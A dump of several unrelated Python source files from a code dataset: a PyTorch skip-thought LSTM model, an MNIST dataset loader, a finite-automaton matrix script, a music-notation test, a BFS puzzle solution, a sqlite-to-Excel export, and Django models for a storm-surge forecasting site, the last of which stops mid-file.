hidden2.cuda()\n \n self.hidden1 = nn.Parameter(hidden1)\n self.hidden2 = nn.Parameter(hidden2)\n \n ##LSTM cells for the decoder\n self.lstmcell_prev = nn.LSTMCell(self.thought_size+self.embedding_dim, self.hidden_size)\n self.lstmcell_next = nn.LSTMCell(self.thought_size+self.embedding_dim, self.hidden_size)\n \n self.wordProject = nn.Linear(in_features=self.hidden_size, out_features=self.num_embeddings)\n self.init_weights()\n \n def init_weights(self):\n initrange = 0.1\n self.wordProject.bias.data.fill_(0)\n self.wordProject.weight.data.uniform_(-initrange, initrange)\n \n def forward(self, inputPrev, inputNext, context):\n hidden10 = self.hidden1.expand(inputPrev.size()[1], -1).contiguous()\n hidden20 = self.hidden2.expand(inputNext.size()[1], -1).contiguous()\n \n c10 = Variable(torch.zeros(inputPrev.size(1), self.hidden_size), requires_grad=False)\n c20 = Variable(torch.zeros(inputNext.size(1), self.hidden_size), requires_grad=False) \n if torch.cuda.is_available():\n c10 = Variable(torch.zeros(inputPrev.size(1), self.hidden_size).cuda(), requires_grad=False)\n c20 = Variable(torch.zeros(inputNext.size(1), self.hidden_size).cuda(), requires_grad=False)\n\n ## geting the context for first time from hidden unit\n #context_prev = self.attentionQuery(hidden10, keys, values)\n \n logits_prev = []\n ##concatenate the context and embedding[0]\n for i in np.arange(0, inputPrev.size()[0]):\n output_curr = torch.cat((inputPrev[i], context), 1)\n hidden10, _ = self.lstmcell_prev(output_curr, (hidden10, c10))\n \n projection_out = self.wordProject(hidden10)\n logits_prev.append(projection_out)\n #context_prev = self.attentionQuery(hidden10, keys, values)\n \n ## Project layer\n logits_prev = torch.stack(logits_prev)\n \n ## geting the context for first time from hidden unit\n #context_prev = self.attentionQuery(context, keys, values)\n \n logits_next = []\n ##concatenate the context and embedding[0]\n for i in np.arange(0, inputNext.size()[0]):\n output_curr = torch.cat((inputNext[i], context), 1)\n hidden20, _ = self.lstmcell_next(output_curr, (hidden20, c20))\n \n projection_out = self.wordProject(hidden20)\n logits_next.append(projection_out)\n #context_prev = self.attentionQuery(hidden20, keys, values)\n \n ## 
Project layer\n logits_next = torch.stack(logits_next) \n\n return logits_prev, logits_next\n \n\nclass UniSKIP_variant(nn.Module):\n def __init__(self, encoder_model, decoder_model, embedding_dim, vocab_size):\n super(UniSKIP_variant, self).__init__()\n self.encoder = encoder_model\n self.decoder = decoder_model\n self.vocab_size = vocab_size\n self.embedding_dim = embedding_dim\n \n self.wordembed = nn.Embedding(num_embeddings=self.vocab_size, embedding_dim=self.embedding_dim)\n self.init_weights()\n \n def init_weights(self):\n initrange = 0.1\n # nn.Embedding has no bias term, so only the weight matrix is initialized\n self.wordembed.weight.data.uniform_(-initrange, initrange)\n \n def forward(self, inputCurr, inputLenghts, inputPrev, inputNext):\n \n # Get the thought of the current sentence\n word_embed_curr = F.tanh(self.wordembed(inputCurr))\n output_ofLastHiddenState = self.encoder(word_embed_curr, inputLenghts)\n \n # Get the embedding for prev and next sentence \n word_embed_prev = F.tanh(self.wordembed(inputPrev)) \n word_embed_next = F.tanh(self.wordembed(inputNext))\n \n logits_prev, logits_next = self.decoder(word_embed_prev, word_embed_next, output_ofLastHiddenState)\n \n return output_ofLastHiddenState, logits_prev, logits_next\n \n## USAGE \n##num_layers, hidden_size, bidirection, embedding_dim\nencoder = STEncoder(1, 512, True, 128)\n\n##hidden_size, embedding_dim, thought_size, vocab_size\ndecoder = STDuoDecoderAttn(256, 128, 512, 9487)\n\n##encoder_model, decoder_model, embedding_dim, vocab_size\nallmodel = UniSKIP_variant(encoder, decoder, 128, 9487)","sub_path":"ConcurrentThoughtsModel.py","file_name":"ConcurrentThoughtsModel.py","file_ext":"py","file_size_in_byte":6969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"176888397","text":"from torchvision.datasets import MNIST\n\nfrom edflow.data.dataset import DatasetMixin\n\n\nclass Dataset_MNIST(DatasetMixin):\n def __init__(self, config):\n self.config = config\n self.data = MNIST(root=\"./data\", train=True, transform=None, download=True)\n self.im_shape = config.get(\"spatial_size\", [28, 28])\n if isinstance(self.im_shape, int):\n self.im_shape = [self.im_shape] * 2\n\n def __len__(self):\n return len(self.data)\n\n def get_example(self, idx):\n example = dict()\n example[\"image\"] = self.data[idx][0]\n example[\"target\"] = self.data[idx][1]\n return example\n","sub_path":"examples/mnist_pytorch/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"372165414","text":"def aceita():\r\n print (\"ACEITA\")\r\n\r\ndef rejeita():\r\n print (\"REJEITA\")\r\n\r\ndef retorna(z):\r\n matriz = []\r\n for i in range(0, z):\r\n linha = []\r\n for j in range(0, z):\r\n n = 0\r\n linha.append(n)\r\n matriz.append(linha)\r\n return matriz\r\n\r\ndef multiplica(m, n):\r\n tam = len(m)\r\n vazia = retorna(tam)\r\n for i in range(tam):\r\n for j in range(tam):\r\n for k in range(tam):\r\n vazia[i][j] += m[i][k]*n[k][j]\r\n return vazia\r\n\r\ndef multiplicaLinha(m, n):\r\n tam = len(m)\r\n vazia = retorna(tam)\r\n for j in range(tam):\r\n for k in range(tam):\r\n vazia[0][j] += m[0][k]*n[k][j]\r\n return vazia\r\n\r\ndef multiplicaColuna(m, n):\r\n tam = len(m)\r\n vazia = retorna(tam)\r\n for i in range(tam):\r\n for k in range(tam):\r\n vazia[i][0] += m[i][k]*n[k][0]\r\n return vazia\r\n\r\ntomate = eval(input())\r\nalface = eval(input())\r\nn = int (input())\r\npalavras = []\r\nfor i 
in range (0, n):\r\n palavras.append(input())\r\n\r\npi = retorna(tomate['estados'])\r\nn = retorna(tomate['estados'])\r\nXa = retorna(tomate['estados'])\r\nXb = retorna(tomate['estados'])\r\nX = retorna(tomate['estados'])\r\n\r\npi2 = retorna(alface['estados'])\r\nn2 = retorna(alface['estados'])\r\nXa2 = retorna(alface['estados'])\r\nXb2 = retorna(alface['estados'])\r\nX2 = retorna(alface['estados'])\r\n\r\npi [0][tomate['inicial']] = 1\r\npi2 [0][alface['inicial']] = 1\r\n\r\nfor i in range (0, len(tomate['final'])):\r\n x = tomate['final'][i]\r\n n [x][0] = 1\r\n\r\nfor i in range (0, tomate['estados']):\r\n j = 0\r\n x = tomate ['delta'][i][j]\r\n Xa[i][x] = 1\r\n\r\nfor i in range (0, tomate['estados']):\r\n j = 1\r\n x = tomate ['delta'][i][j]\r\n Xb[i][x] = 1\r\n\r\n\r\n\r\nfor i in range (0, len(alface['final'])):\r\n x = alface['final'][i]\r\n n2 [x][0] = 1\r\n\r\nfor i in range (0, alface['estados']):\r\n j = 0\r\n x = alface['delta'][i][j]\r\n Xa2[i][x] = 1\r\n\r\nfor i in range (0, alface['estados']):\r\n j = 1\r\n x = alface['delta'][i][j]\r\n Xb2[i][x] = 1\r\n\r\n\r\nfor w in palavras:\r\n X = pi[:]\r\n X2 = pi2 [:]\r\n for letras in w:\r\n X = multiplica(X, Xa if letras == 'a' else Xb)\r\n X2 = multiplica(X2, Xa2 if letras == 'a' else Xb2)\r\n X = multiplicaColuna(X, n)\r\n X2 = multiplicaColuna(X2, n2)\r\n if X[0][0] != 0 or X2[0][0] != 0:\r\n aceita()\r\n else:\r\n rejeita()\r\n","sub_path":"Matrizes.py","file_name":"Matrizes.py","file_ext":"py","file_size_in_byte":2385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"327500045","text":"from pathlib import Path\n\nfrom musicscore.musicstream.streamvoice import SimpleFormat\nfrom musicscore.musictree.treescoretimewise import TreeScoreTimewise\nfrom musicxmlunittest import XMLTestCase\n\npath = Path(__file__)\n\n\nclass TestAddPedal(XMLTestCase):\n def setUp(self) -> None:\n self.score = TreeScoreTimewise()\n\n def test_imply(self):\n xml_path = path.parent.joinpath(path.stem + '_imply.xml')\n sf = SimpleFormat(quarter_durations=[1, 1, 1, 1])\n sf.chords[0].add_pedal('start')\n sf.chords[2].add_pedal('stop')\n sf.to_stream_voice().add_to_score(self.score)\n self.score.write(xml_path)\n self.assertCompareFiles(xml_path)\n","sub_path":"tests/musictree/chord/directionstype/test_add_pedal.py","file_name":"test_add_pedal.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"551196709","text":"import sys\nfrom collections import deque\n\nN, K = map(int, sys.stdin.readline().split())\nMAX_SIZE = 1000001\n\ndef valid(x):\n return 0 <= x < MAX_SIZE\n\ndef bfs(X,K):\n visited = [0] * MAX_SIZE\n queue = deque()\n queue.append((X,0))\n visited[X] = 1\n\n while queue:\n location, time = queue.popleft()\n\n if location == K:\n return time\n\n for move in [location-1, location+1, 2*location]:\n if valid(move) and visited[move] == 0:\n # mark on enqueue so each position is queued at most once\n visited[move] = 1\n queue.append((move, time + 1))\n # every K in range is reachable from N, so this is only a safety fallback\n return -1\n\nprint(bfs(N, K))","sub_path":"백준/1697_숨바꼭질.py","file_name":"1697_숨바꼭질.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"154744809","text":"import sqlite3\r\nfrom xlsxwriter.workbook import Workbook\r\n\r\nworkbook = Workbook('output2.xlsx')\r\nworksheet = workbook.add_worksheet()\r\n\r\ndb=sqlite3.connect('Finance.db')\r\nconn=db.cursor()\r\n\r\ndata=conn.execute('SELECT * FROM fees_pay')\r\nfor i, 
row in enumerate(data):\r\n\tprint(row)\r\n\tworksheet.write(i,0, row[0])\r\n\tworksheet.write(i,1, row[1])\r\nworkbook.close()\r\n\r\n\r\ndb.close()","sub_path":"excel.py","file_name":"excel.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"517248797","text":"from pytz import timezone, utc\nfrom datetime import datetime, timedelta\n\nfrom django.db import models\nfrom django.contrib.auth.models import User\nfrom localflavor.us.us_states import STATE_CHOICES\nfrom localflavor.us.models import USStateField\n#from phonenumber_field.modelfields import PhoneNumberField\nfrom localflavor.us.models import PhoneNumberField\n\nfrom django.db.models.signals import post_save\nfrom django.db.models.signals import post_delete\nfrom django.db.models.signals import pre_save\n\nfrom django.template.loader import render_to_string\n\n#from notification import send_notifications, send_storm_notifications\n\n###############################################################################\n#data access permission (cera.json file)\nUSER_PERMISSION = (\n (\"pub\", \"pub\"),\n (\"nc_ng\", \"nc_ng\"),\n (\"pro\", \"pro\")\n)\n\nclass UserProfile(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE)\n organization = models.CharField(default='', max_length=100, blank=True)\n job_title = models.CharField(default='', max_length=100, blank=True)\n city = models.CharField(max_length=50, default='', blank=True)\n state = USStateField(choices=STATE_CHOICES, default='', blank=True)\n phone = PhoneNumberField(default='', blank=True)\n cera = models.CharField('User permission', max_length=5, choices=USER_PERMISSION, default='nc_ng')\n\n def __str__(self):\n return self.user.username\n\n class Meta:\n verbose_name = \"User Profile\"\n ordering = ['user__username']\n\ndef create_profile(sender, **kwargs):\n if kwargs['created']:\n user_profile = UserProfile.objects.create(user=kwargs['instance'])\n\n# connect the handler so a profile row is created whenever a new User is saved\npost_save.connect(create_profile, sender=User)\n\n###############################################################################\nclass storm_year(models.Model):\n\n id = models.AutoField('ID', primary_key=True, unique=True)\n year = models.IntegerField()\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n 
dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def __unicode__(self):\n return str(self.year)\n\n class Meta:\n #name for class\n verbose_name = \"year\"\n verbose_name_plural = \"Storm Years\"\n ordering = ['-year']\n\n###############################################################################\nclass storm(models.Model):\n\n id = models.AutoField('ID', primary_key=True, unique=True)\n year = models.ForeignKey(storm_year, on_delete=models.CASCADE)\n# storm_number = models.IntegerField('NHC storm number', help_text='Omit leading zeros.')\n storm_number = models.CharField('NHC storm number', max_length=3, help_text='Omit leading zeros.')\n stormname = models.CharField('storm name', max_length=22, null=True, blank=True)\n start_date_utc = models.DateTimeField('First NHC advisory', help_text='Provide the first advisory in CDT date format YYYY-MM-DD and CDT time format HH:MM.', null=True, blank=True)\n last_date_utc = models.DateTimeField('Last NHC advisory', help_text='Provide the last advisory in CDT date format YYYY-MM-DD and CDT time format HH:MM.', null=True, blank=True)\n has_hindcast = models.BooleanField('storm with hindcast (has_hindcast)', default=False)\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def get_storm_name(self):\n # stormname is nullable, so guard against None before calling len()\n if self.stormname and len(self.stormname) 
> 0:\n return self.stormname\n return self.storm_number\n\n def __unicode__(self):\n return (\"%s %s\" % (str(self.year), self.stormname))\n\n class Meta:\n ordering = ['-start_date_utc']\n\n###############################################################################\nSTORMCLASS_CHOICES = (\n (\"db\", \"Disturbance\"),\n (\"ds\", \"Dissipating\"),\n (\"rem\", \"Remnants\"),\n (\"ptc\", \"Potential Tropical Cyclone\"),\n (\"sd\", \"Subtropical Depression\"),\n (\"ss\", \"Subtropical Storm\"),\n (\"pt\", \"Post-Tropical Cyclone\"),\n (\"ex\", \"Extratropical System\"),\n (\"td\", \"Tropical Depression\"),\n (\"ts\", \"Tropical Storm\"),\n (\"hu\", \"Hurricane\")\n)\n\nCATEGORY_CHOICES = (\n (\"db\", \"DS\"), # Disturbance\n (\"ds\", \"DS\"), # Dissipating\n (\"rem\", \"REM\"), # Remnants\n (\"ptc\", \"PTC\"), # Potential Tropical Cyclone\n (\"sd\", \"SD\"), # Subtropical Depression\n (\"ss\", \"SS\"), # Subtropical Storm\n (\"td\", \"TD\"), # Tropical Depression\n (\"ts\", \"TS\"), # Tropical Storm\n (\"pt\", \"PT\"), # Post-Tropical Storm\n (\"ex\", \"EX\"), # Extratropical Systems\n (\"1\", \"H1\"), # Hurricane 1\n (\"2\", \"H2\"),\n (\"3\", \"H3\"),\n (\"4\", \"H4\"),\n (\"5\", \"H5\")\n)\n\nclass advisory(models.Model):\n id = models.AutoField('ID', primary_key=True, unique=True)\n advisory = models.CharField('NHC advisory number', max_length=3, help_text='Omit leading zeros.')\n storm = models.ForeignKey(storm, on_delete=models.CASCADE)\n stormclass = models.CharField(max_length=3, choices = STORMCLASS_CHOICES, null=True, blank=True)\n category = models.CharField(max_length=3, choices = CATEGORY_CHOICES, null=True, blank=True)\n adv_time_utc = models.DateTimeField('NHC advisory time', help_text='Provide the advisory time in CDT date format YYYY-MM-DD and CDT time format HH:MM:SS.', null=True, blank=True)\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = 
models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def __unicode__(self):\n return str(self.advisory)\n\n class Meta:\n # plural name for class\n verbose_name_plural = \"Advisories and Tracks\"\n ordering = ['-adv_time_utc']\n\n###############################################################################\nTRACK_CHOICES = (\n (\"t01\", \"NHC forecast\"),\n (\"t02\", \"max wind speed\"),\n (\"t03\", \"over land speed\"),\n (\"t04\", \"veer left\"),\n (\"t05\", \"veer right\"),\n (\"t06\", \"max radius\"),\n (\"t07\", \"max wind speed only\"),\n (\"t08\", \"constant max radius\"),\n (\"t14\", \"shift left\"), \n (\"t15\", \"shift right\"), \n # FEMA runs\n (\"t88\", \"synthetic\")\n)\n\nclass track(models.Model):\n id = models.AutoField('ID', primary_key=True, unique=True)\n\n track = models.CharField(max_length=3, choices = TRACK_CHOICES)\n mod_percent = models.CharField('percent/miles track modification', max_length=5, null=True, blank=True, default=0)\n advisory = models.ForeignKey(advisory, on_delete=models.CASCADE)\n # at least one model run uses this track (for clickable subtracks)\n has_model_run = models.BooleanField(default=False)\n\n dependent_enable_public_dev = models.BooleanField(default=False)\n dependent_enable_public_pro = models.BooleanField(default=False)\n dependent_enable_public_pub = models.BooleanField(default=False)\n dependent_enable_public_ng = models.BooleanField(default=False)\n dependent_enable_public_nc = models.BooleanField(default=False)\n dependent_enable_public_pr = models.BooleanField(default=False)\n dependent_enable_public_ri = models.BooleanField(default=False)\n dependent_enable_public_st = models.BooleanField(default=False)\n dependent_enable_adminmode_dev = models.BooleanField(default=True)\n dependent_enable_adminmode_pro = models.BooleanField(default=True)\n dependent_enable_adminmode_pub = models.BooleanField(default=True)\n dependent_enable_adminmode_ng = models.BooleanField(default=True)\n dependent_enable_adminmode_nc = models.BooleanField(default=True)\n dependent_enable_adminmode_pr = models.BooleanField(default=True)\n dependent_enable_adminmode_ri = models.BooleanField(default=True)\n dependent_enable_adminmode_st = models.BooleanField(default=True)\n dependent_asgs_dev = models.BooleanField(default=False)\n dependent_asgs_pro = models.BooleanField(default=False)\n dependent_asgs_pub = models.BooleanField(default=False)\n dependent_asgs_nc = models.BooleanField(default=False)\n dependent_asgs_ng = models.BooleanField(default=False)\n dependent_asgs_pr = models.BooleanField(default=False)\n dependent_asgs_ri = models.BooleanField(default=False)\n dependent_asgs_st = models.BooleanField(default=False)\n dependent_region_nc_ng = models.BooleanField(default=False)\n dependent_region_nc = models.BooleanField(default=False)\n dependent_region_ng = models.BooleanField(default=False)\n dependent_region_ri = models.BooleanField(default=False)\n dependent_region_pr = models.BooleanField(default=False)\n\n def __unicode__(self):\n return \"ID: %s (%s)\" % (self.id, self.track)\n\n def get_track_info_text(self):\n if self.advisory.advisory == '999':\n return 'NHC best track'\n # 991: hindcast OWI (Irma 2017 with different start time)\n if self.advisory.advisory == '991':\n return 'best track'\n if self.track == 't01' or self.track == 't88':\n return self.get_track_display()\n if self.track != 't08':\n return \"%s %s%% \" % (self.get_track_display(), 
self.mod_percent)\n return \"%s %snm\" % (self.get_track_display(), self.mod_percent)\n\n class Meta:\n ordering = ['id']\n\n\n###############################################################################\nGRID_CHOICES = (\n (\"cpra_2011_v03a\",\"CPRAv3\"),\n (\"cpra_2017_v07a_chk\",\"CPRA2017v07\"),\n (\"cpra2017_v11k-CurrentConditions_chk\",\"CPRA2017v11\"),\n (\"cpra2017_v12c-CurrentConditions-WithUpperAtch_chk\",\"CPRA2017v12\"),\n (\"ec95d\",\"EC95D\"),\n (\"FEMA_R2_merge_VALID_correct_gcs_mNAVD\",\"FEMAR2\"),\n# (\"FEMA_R2_norivers_gcs_mNAVD\",\"FEMAR2_2016\"),\n (\"FEMAR3\",\"FEMAR3\"),\n (\"FEMAR4\", \"FEMAR4\"),\n (\"sl15_2010_HSDRRS_2012_v9\",\"HSDRRS\"),\n (\"HSDRRS2014_MRGO_leveeupdate_fixSTC_MX\",\"HSDRRS2014\"),\n (\"hsofs\", \"HSOFS\"),\n (\"ULLR2D\", \"IOOSul\"),\n (\"LA_v12h-WithUpperAtch\", \"LAv12hAtch\"),\n (\"LA_v17a-WithUpperAtch_chk\", \"LAv17a\"),\n (\"LPRBv1\", \"LPRBv1\"),\n (\"NACCS_2014_r01\", \"NAC2014\"),\n (\"narragansett\", \"NARRA\"),\n (\"narragansett_bay_ec_95d_v2\", \"NARRA2015v2\"),\n (\"nc6b\",\"NC6B\"),\n (\"nc_inundation_v9.99\",\"NCv999\"),\n (\"nc_inundation_v9.99_w_rivers\",\"NCv999riv\"),\n (\"ocpr_v19a_DesAllemands4CERA\",\"OCPRv19\"),\n# (\"norl_s08_g05f_grd\",\"S08\"),\n (\"prv01\", \"PRv01\"),\n (\"sl15v3_2007_r9a\",\"SL15v3\"),\n (\"sl15_2007_IHNC_r03q_levchk\",\"SL15v7\"),\n (\"sl16_alpha_2007_26\",\"SL16\"),\n (\"tx2008r35h\", \"TX2008\"),\n (\"tx2008r35hred\", \"TX2008red\"),\n (\"wFL_v4.1.0\",\"wFlv41\"),\n (\"ECIRL\",\"ECIRL\")\n)\n\nWINDMODEL_CHOICES = (\n (\"fitz-nws4\",\"FITZ Wind Scheme\"),\n (\"GFDL_URI\", \"GFDL URI\"),\n # NOAA Hurricane Research Division\n (\"hwind\", \"NOAA HWind\"),\n # with background winds\n (\"lsu\",\"LSU Wind Model\"),\n (\"NWS-305\",\"NWS-305\"),\n (\"vortex-nws308\", \"NWS-308\"),\n # Oceanweather Inc. 
Fast Delivery Meteorology\n    (\"NWS-12\",\"OWI NWS-12\"),\n    (\"NWS-312\",\"OWI NWS-312\"),\n    # simplified Holland B derived from the initial tropical cyclone\n    # conditions provided by NHC and JTWC (sometimes referred to as TC vitals\n    # or the TC bogus), used by RI group\n    (\"tc-vitals\", \"TC Vitals\"),\n    (\"tides_only\", \"Tides only\"),\n    # Asymmetric Holland Model\n    (\"vortex-nws19\",\"AHM\"),\n    # version 2014 - Generalized Asymmetric Holland Model\n    (\"vortex-nws20\",\"GAHM\"),\n    # Asymmetric Vortex + Waves\n    (\"vortex-nws319\",\"AHM+SWAN\"),\n    (\"vortex-nws320\",\"GAHM+SWAN\"),\n    (\"weatherflow-nws312\", \"Weatherflow\"),\n    (\"WNAMAW12-NCP\",\"12km NAM\"),\n    (\"WNAMAW12+NWS19\",\"12km NAM + AHM\"),\n    (\"WNAMAW32-NCP\",\"32km NAM\")\n)\n\nWMSSERVER_CHOICES = (\n    (\"NC1\",\"nc-cera.renci.org\"),\n    (\"NC2\",\"nccera-2.renci.org\"),\n    (\"LA1\",\"cera.cct.lsu.edu\"),\n    (\"LA2\",\"twister.cct.lsu.edu\"),\n    (\"LA3\",\"jupiter.cct.lsu.edu\"),\n    (\"LA4\",\"juno.cct.lsu.edu\"),\n    (\"LA5\",\"luna.cct.lsu.edu\"),\n    (\"LA6\",\"apollo.cct.lsu.edu\")\n)\n\ndef get_data_host_display(short_name):\n    for choice in WMSSERVER_CHOICES:\n        if choice[0] == short_name:\n            return choice[1]\n    return 'unknown'\n\n
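# Example (illustrative): get_data_host_display(\"LA1\") returns \"cera.cct.lsu.edu\",\n# while an unmapped key falls back to the string 'unknown'.\n\n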
ADCIRCDATAHOST_CHOICES = (\n    (\"blueridge.renci.org\",\"blueridge.renci.org\"),\n    (\"coconut.dmes.fit.edu\",\"coconut.dmes.fit.edu\"),\n    (\"croatan.renci.org\", \"croatan.renci.org\"),\n    (\"diamond.erdc.hpc.mil\", \"diamond.erdc.hpc.mil\"),\n    (\"garnet.erdc.hpc.mil\",\"garnet.erdc.hpc.mil\"),\n    (\"hatteras.renci.org\", \"hatteras.renci.org\"),\n    (\"lonestar.tacc.utexas.edu\", \"lonestar.tacc.utexas.edu\"),\n    (\"mike.hpc.lsu.edu\", \"mike.hpc.lsu.edu\"),\n    (\"MSUserver\",\"MSU server\"),\n    (\"queenbee.loni.org\",\"queenbee.loni.org\"),\n    (\"tezpur.hpc.lsu.edu\",\"tezpur.hpc.lsu.edu\"),\n    (\"topaz.erdc.hpc.mil\", \"topaz.erdc.hpc.mil\"),\n    (\"thunder.afrl.hpc.mil\", \"thunder.afrl.hpc.mil\")\n)\n\nMAP_REGION = (\n    (\"nc_ng\",\"nc_ng\"),\n    (\"ng\",\"ng\"),\n    (\"nc\",\"nc\"),\n    (\"pr\",\"pr\"),\n    (\"ri\",\"ri\")\n)\n\nLEGEND_CHOICES = (\n    (\"ng\",\"Gulf\"),\n    (\"nc\",\"Atlantic\"),\n    (\"pr\",\"Puerto\")\n)\n\nclass adcrun_info(models.Model):\n\n    #primary model run ID\n    id = models.AutoField('ID', primary_key=True, unique=True)\n\n    # the following fields should be many-to-many relations -> one adcrun_info can have many asgs systems and many layerinfos\n    # asgs_systems = models.ManyToManyField(asgs_system)\n    # layerinfos = models.ManyToManyField(layerinfo, null=True, blank=True)\n    # the approach using ForeignKeys in the associated models (asgs_system and layerinfo) blows up the DB\n    # but is much simpler in admin.py/views.py\n\n    adcrun_daytime_utc = models.DateTimeField('ASGS start day and time') # asgs model start time\n    # default: 3hrs after runstarttime to match advisory times\n    adcrun_daytime_cera = models.DateTimeField('CERA start day and time', help_text='Normally 3 hrs after RunStartTime to match advisory time (except hindcasts).')\n    adcrun_enddaytime_utc = models.DateTimeField('ASGS end day and time', null=True, blank=True)\n\n    ### has at least one associated storm advisory or advisory 999\n    has_adv = models.BooleanField('active storm (has_adv)', default=False)\n    track_id = models.ForeignKey(track, verbose_name='ID track', help_text='Select the ID from the associated track', on_delete=models.CASCADE, null=True, blank=True)\n    ### pseudo storm (real storm under different conditions or test/synthetic storms)\n    is_pseudo = models.BooleanField('pseudo', default=False)\n\n    windmodel = models.CharField('wind model', max_length=25, null=True, blank=True, choices=WINDMODEL_CHOICES)\n    grid = models.CharField('Grid', max_length=50, choices=GRID_CHOICES)\n    grid_datum = models.CharField('grid datum', max_length=4)\n    # 'Model Info' select box: default is windmodel/grid (function 'get_model_info_text')\n    # for multiple runs on DEV site, the asgs_instance will be added\n    asgs_instance = models.CharField('ASGS instance', max_length=25, null=True, blank=True)\n    # adcrun identifier for equal runs except description or adcirc_datahost (developer/professional/stations page)\n    sequence_nr = models.IntegerField('Sequence Nr.', null=True, blank=True)\n    # info button\n    description = models.CharField(null=True, blank=True, max_length=500)\n    surfheight = models.CharField('Sea Surface Height', null=True, blank=True, max_length=10)\n    h0 = models.CharField('H0', null=True, blank=True, max_length=6)\n    msboundflux = models.CharField('MS Boundary Flux', null=True, blank=True, max_length=10)\n    msboundid = models.CharField('MS Boundary GageID', null=True, blank=True, max_length=25)\n    atboundflux = models.CharField('AT Boundary Flux', null=True, blank=True, max_length=10)\n    atboundid = models.CharField('AT Boundary GageID', null=True, blank=True, max_length=25)\n    ncpu = models.CharField('Number CPU', null=True, blank=True, max_length=5)\n    remark = models.CharField(null=True, blank=True, max_length=300)\n\n    enable_public = 